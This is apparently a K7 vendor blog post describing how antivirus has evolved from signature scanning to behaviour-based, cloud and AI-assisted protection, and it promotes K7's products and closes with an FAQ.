Computers have needed antivirus ever since computers began entering the mainstream. Viruses were created as soon as computers grew beyond specialised use and could be used for meaningful activity by a larger section of the public. Some viruses were just pranks, but the viruses we are familiar with are a lot more serious and can be severely destructive. Worryingly, the destructive impact of viruses is growing as we live in an increasingly interconnected and digitally-enabled world.

What will we need in antivirus to counter the cyberattacks of tomorrow? Let us first examine where antivirus has been to understand where it must go.

Antivirus of the Past

The term ‘virus’ was coined to describe simple cyberthreats that spread like a biological virus e.g., the virus would arrive at a PC on a floppy disk and copy itself to any floppy disk that was used on that computer, spreading to other PCs when those floppy disks were used on those computers. The term ‘antivirus’ was coined to describe programs that defended against such cyberthreats.

Signature-based Protection

The antivirus of the past seems very simple to the antivirus we have today and will have tomorrow. Antivirus developers would analyse a virus in a lab and develop a signature to identify the virus. A group of such signatures would form a definition update that would be distributed through floppy disks or CDs/DVDs and later through the internet. As the number of viruses increased, having individual signatures for each virus made the size of the definition updates impractically large. Generic definitions were developed that could identify a family of similar viruses. The antivirus programs would scan every file on the disk of the PC and check them against the definitions to identify viruses.

Limitations of Antivirus of the Past

Cyberthreats soon evolved beyond simple viruses. Computing users face a wide array or cyberattacks including worms, Trojans, ransomware, and zero-day attacks, that are collectively known as malware. Web threats are widely encountered, including drive-by downloads and phishing websites that mimic legitimate websites. Email and text messaging platforms are used to deliver malicious attachments and links. Malicious apps are found even on official app stores for mobile devices. Hackers develop obfuscation techniques to hide their malware from signature-based scanning. The number of cyberthreats have also significantly increased, with over 450,000 new threats registered every day.

The antivirus of the past, with simple file scanning and signature-based protection, is unable to handle the variety and volume of modern cyberthreats. While file scanning and signatures are still necessary, they are no longer sufficient to protect computing users. The name ‘antivirus’ still remains, but digital protection systems have to be capable of a lot more than just looking for viruses.

Modern Capabilities of Antivirus

Real-time Protection

Modern antivirus cannot rely on running a virus scan once a day, and has to be capable of scanning for threats in real time. When a user opens an email attachment, the file has to be scanned before it opens. When a file is downloaded from the internet, it must be scanned before it can run. This is real-time protection.

This does not mean scheduled scans are no longer required. Malware can be designed to stay dormant and exhibit no malicious behaviour until a specific date or event occurs. Deep scanning at scheduled intervals is still necessary to spot such dormant malware.

Deobfuscation

Obfuscation is a technique used by threat actors to disguise malware and evade detection by antivirus programs. Antivirus must be capable of deconstructing files and have deobfuscation/decloaking capabilities to identify if, and how, the files are malicious.

Behaviour-based Protection

While signature-based protection continues to be effective at stopping malware, it depends on the malware being identified, analysed in a lab, having a signature generated, and the signature being received by the user before it can be effective. The first netizens to encounter a type of malware will, therefore, not be protected as no signature will have been generated yet. Such unknown attacks are known as zero-day attacks. Due to the very large number of malware created every day, the probability of encountering malware before a signature is available keeps increasing. Behaviour-based protection, which does not rely on signatures and instead analyses the behaviour of a file or process to identify malicious activity, protects users against such unknown threats.

Well-designed behaviour-based protection can be very effective. In a unique test, a cybersecurity analyst turned off K7’s signature-based detection and used only K7’s behaviour-based detection to test its effectiveness against ransomware samples, effectively turning all the samples into zero-day ransomware. K7’s antivirus successfully defended against all the ransomware samples and received a perfect score in the test, demonstrating the power of behaviour-based protection.

File-less Malware Protection

Malware has traditionally existed as files, but file-less malware have emerged. This form of malware uses malicious scripts that run inside legitimate applications and processes and therefore the malware exists only in memory, leaving nothing on the device’s disk for conventional antivirus to examine. Antivirus like K7’s antivirus supports the Windows Antimalware Scan Interface (AMSI) which enables scanning of dynamic scripts to stop malicious scripts from running.

Firewall

Most, if not all, computers can be expected to connect to the internet in our interconnected world and may additionally also connect to other computing devices through a local network. Data traffic flowing into and outside the computer may indicate threat activity e.g., a seemingly harmless file may connect to a Command & Control (C2) server operated by a threat actor that will send instructions or even malicious scripts to be executed. Antivirus programs like K7 Ultimate Security include a firewall that inspects all data flowing into and out of the computer to identify and block potential network-based threats.

Web Protection

Modern day life revolves around accessing various websites and therefore websites have become a source of cyberthreats. Computing users may be sent links to malicious websites; hackers may create phishing websites that mimic legitimate websites (such as banking websites) to mislead users into providing their credentials; and genuine websites may be compromised to launch drive-by downloads where a malicious file is downloaded to the user’s devices without the user clicking on a download link or otherwise interacting with the webpage in any way.

K7’s antivirus includes phishing protection to block phishing websites and also block links in emails and other text-based media that direct users to phishing websites. Drive-by download blocking ensures that malicious files do not automatically download from websites.

Cloud-based Protection

Given that there are over 1.2 billion websites in the world and 252,000 new websites are created every day, how will antivirus software identify malicious websites? Especially when malicious websites even appear in search engine result pages? K7’s antivirus includes Safe Surf and Safe Search features which use cloud-based website verification to highlight unsafe websites and keep netizens safe from dangerous internet destinations.

Webcam Protection

Hackers need not make their attacks obvious by destroying data or displaying threatening messages. A cyberattack may be unobtrusive e.g., spying on your through your webcam. Antivirus software like K7 Total Security allows you to control, or even block, webcam access to prevent webcam spying.

Mobile Device Protection

Antivirus is not just for desktops and laptops. Mobile phones and tablets are increasingly used to satisfy the computing needs of netizens and are even the only computing device for many users. Mobile devices are also targeted by hackers and suffer many cyberattacks, including phishing and the availability of malicious apps even on official app stores. Mobile devices are a particularly attractive target for hackers as OTPs are often received on mobile devices and malware can be used to steal OTPs and compromise user accounts or transfer funds from bank accounts. Antivirus solutions such as K7 Mobile Security for Android and iOS keep users safe from these threats.

The Future of Antivirus

Cyberattacks are not going to stop. They are going to increase in frequency and impact and, therefore, antivirus also has to evolve to keep users safe. Artificial Intelligence/Machine Learning (AI/ML) and the cloud will be leveraged by antivirus developers to protect users. We have already discussed how the cloud is used in antivirus and K7 is already using AI/ML to improve protection.

Artificial Intelligence

Antivirus developers can use AI/ML in 3 ways:

Threat Hunting

As digital interaction increases, the volume of potential threat signals increases. AI can be used by antivirus developers to analyse the data and rapidly identify patterns to spot emerging attacks.

Enhanced Behavioural Protection

We have already discussed the importance of behaviour-based protection. AI can strengthen behaviour analysis to spot anomalous behaviour across a wide variety of contexts and flag potential malicious activity.

Website Analysis

The content and other authenticity indicators of websites can be used to identify malicious websites and classify genuine websites for category-based blocking e.g., to protect children from inappropriate content.

Protection from AI

While antivirus can protect using AI, antivirus can also protect users against malicious uses of AI. Phishing messages that are crafted using AI may appear genuine and convincing, but phishing link blocking in antivirus will keep users safe. Agentic AI may be compromised by threat actors to use AI agents to perform malicious actions, but antivirus will identify and stop suspicious downloads and processes.

K7 is an early adopter of AI to enhance the threat stopping power of K7’s antivirus.

Cloud

The cloud will be used to shorten the time to distribute updates to the antivirus installed on each user’s device. User’s devices will connect to a cloud server near them to receive the update quickly rather than having to queue to receive updates from a few congested servers.

Cloud technology will also allow users to backup their data to the cloud, improving resilience not just against cyberattacks but also against hardware events such as disk failure. Clouds data backup services are already available, and the speed and size of such backups will improve as cloud storage and transfer become cheaper.

Users may already be familiar with digital sandboxes that allow them to open files and run applications, that are suspected of being malicious, in an isolated environment without risking the rest of their digital infrastructure. Sandboxes hosted in the cloud will make it easier for users to access such technology, collaborate with security experts through the cloud to analyse the samples, and reduce the risk of viruses spreading through their home or business network.

The cloud will also be increasingly used to control cybersecurity especially in enterprise environments. K7’s enterprise solutions already use consoles hosted in the cloud to manage cybersecurity for businesses, without being constrained by time or place.

Antivirus has always been an arms race between cyberattackers and cyber defenders. Hackers will harness technologies such as AI and the cloud to augment their attacks and antivirus developers will harness these, and other, technologies to prevent attacks. Defenders must be determined and resolute in their efforts to ensure the digital realm remains a safe space, and guard against complacency.

Computing users from around the world who wish to remain safe in cyberspace rely on K7’s multi-award-winning technology to protect themselves on their preferred platforms against the cyberthreats of today and tomorrow.

FAQs

1. Why is yesterday’s antivirus unable to protect today’s users?

Cyberthreats of yesterday were relatively simple and so were the antivirus solutions. Such antivirus, that depended on signature-based protection, will not be able to protect users against modern threats including threats that are specifically designed to evade signature-based detection. The current threat landscape includes zero-day attacks, phishing, and attacks on mobile devices. The antivirus of today, and tomorrow, must be capable of protecting the entire digital lifestyle of the user.

2. How will the antivirus of tomorrow differ from the antivirus of today?

Just like the antivirus of today builds on antivirus of the past and even includes signature-based protection, so also will the antivirus of tomorrow add to the antivirus of today by increasing the speed of detection and distribution of updates, and use technologies like AI to analyse behaviour and identify and stop even completely unknown threats. The ability to spot patterns and identify potential threats before they turn into emergent threats will be particularly important in stopping tomorrow’s cyberattacks.

3. How does K7 stop the viruses of today and tomorrow?

K7’s antivirus already uses AI and cloud-based protection to stop viruses and other cyberattacks. Our antivirus is also backed by K7 Labs’ analysis of hundreds of thousands of threat samples every day that enables us to distribute multiple updates every day, understand and anticipate the evolution of cyberthreats, and continuously refine our products to ensure peace of mind for our users against present and future cyberattacks.